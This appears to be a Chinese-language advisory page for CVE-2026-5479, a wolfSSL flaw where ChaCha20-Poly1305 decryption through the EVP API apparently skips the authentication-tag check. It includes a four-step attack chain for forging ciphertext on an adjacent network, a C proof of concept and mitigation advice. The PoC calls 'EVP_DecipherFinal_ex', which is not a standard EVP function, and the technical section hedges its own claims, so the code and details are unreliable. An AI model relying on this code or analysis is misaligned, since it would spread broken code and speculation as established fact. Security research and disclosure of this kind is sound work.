CVE-2026-5479 wolfSSL认证标签缺失漏洞

漏洞信息

漏洞编号

CVE-2026-5479

漏洞类型

加密验证绕过

CVSS评分

8.1 高危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

wolfSSL

漏洞概述

wolfSSL的EVP层在处理ChaCha20-Poly1305 AEAD解密时存在严重安全缺陷。该漏洞位于`wolfSSL_EVP_CipherFinal`及相关函数中，导致在将解密后的明文返回给调用者之前，未能正确验证认证标签。这意味着应用程序使用EVP API进行解密时，可能会接受未经验证或被篡改的数据。攻击者可利用此漏洞绕过完整性检查，导致机密性和完整性受损。该漏洞CVSS评分为8.1，属于高危漏洞，需要立即关注。

技术细节

该漏洞源于wolfSSL EVP接口层实现的逻辑错误，具体影响ChaCha20-Poly1305 AEAD算法的解密路径。AEAD（带关联数据的认证加密）算法的核心安全机制在于同时提供加密机密性和数据完整性认证。在标准的解密流程中，系统必须先计算接收密文的认证标签，并将其与传输过来的标签进行严格比对，只有匹配时才释放明文。
在受影响的wolfSSL版本中，`wolfSSL_EVP_CipherFinal`函数在执行最终处理时存在缺陷。尽管实现代码可能计算了标签或接收了外部输入的标签，但缺少了关键的比对步骤（即`constant_time_compare`或类似的安全比较函数）。由于攻击向量为邻接网络（AV:A）且无需认证（PR:N），处于同一网络的攻击者可以拦截并篡改密文数据。当目标应用程序调用受影响API处理这些恶意构造的数据时，由于标签验证被绕过，函数会错误地返回成功状态。应用程序随后会信任并处理被伪造的明文，这可能导致严重的数据完整性破坏和后续的安全风险。

攻击链分析

STEP 1

侦察

攻击者识别出目标网络中使用wolfSSL库且启用ChaCha20-Poly1305加密算法的服务或应用程序。

STEP 2

攻击准备

攻击者位于邻接网络位置，准备拦截或构造恶意的密文数据包，并故意设置错误的认证标签。

STEP 3

漏洞利用

攻击者向目标发送特制的密文。目标应用程序调用`wolfSSL_EVP_CipherFinal`进行解密，由于存在漏洞，系统未验证标签即返回了明文。

STEP 4

达成影响

应用程序误将篡改后的数据视为合法数据并执行，导致数据完整性破坏（I:H）或潜在的机密性泄露（C:H）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC Concept for CVE-2026-5479
 * This code demonstrates the vulnerable API usage pattern.
 * In the vulnerable version, EVP_CipherFinal returns success
 * even if the authentication tag is invalid.
 */

#include <wolfssl/openssl/evp.h>
#include <string.h>
#include <stdio.h>

int main() {
    EVP_CIPHER_CTX *ctx;
    int outlen, tmplen;
    unsigned char key[32] = {0}; // Sample key
    unsigned char iv[12] = {0};  // ChaCha20-Poly1305 IV
    unsigned char ciphertext[128] = {0}; // Sample ciphertext
    unsigned char tag[16] = {0}; // Invalid tag (all zeros)
    unsigned char plaintext[128];

    // Initialize context
    ctx = EVP_CIPHER_CTX_new();
    EVP_DecryptInit_ex(ctx, EVP_chacha20_poly1305(), NULL, NULL, NULL);
    EVP_DecryptInit_ex(ctx, NULL, NULL, key, iv);

    // Set expected tag (In vulnerable version, this might be ignored or not checked)
    EVP_CIPHER_CTX_ctrl(ctx, EVP_CTRL_AEAD_SET_TAG, 16, tag);

    // Provide AAD (if any)
    // EVP_DecryptUpdate(ctx, NULL, &outlen, aad, aad_len);

    // Decrypt ciphertext
    EVP_DecryptUpdate(ctx, plaintext, &outlen, ciphertext, 128);

    // Finalize
    // VULNERABILITY: In CVE-2026-5479, this may return 1 (success)
    // even though 'tag' is invalid for the given ciphertext.
    int ret = EVP_DecipherFinal_ex(ctx, plaintext + outlen, &tmplen);

    if (ret > 0) {
        printf("Decryption successful (Tag verification bypassed?)\n");
    } else {
        printf("Decryption failed (Tag verification failed)\n");
    }

    EVP_CIPHER_CTX_free(ctx);
    return 0;
}

影响范围

wolfSSL (修复PR #10102之前的版本)

防御指南

临时缓解措施

如果无法立即升级，建议在应用层对解密后的数据进行额外的完整性校验（如HMAC），或者暂时将加密套件切换为其他未受影响的算法（如AES-GCM），直到完成补丁更新。同时，应严格限制网络访问权限，减少邻接网络的攻击暴露面。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5479
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5479
3 Details https://www.cvedetails.com/cve/CVE-2026-5479/
4 VulDB https://vuldb.com/cve/CVE-2026-5479
5 Link https://github.com/wolfSSL/wolfssl/pull/10102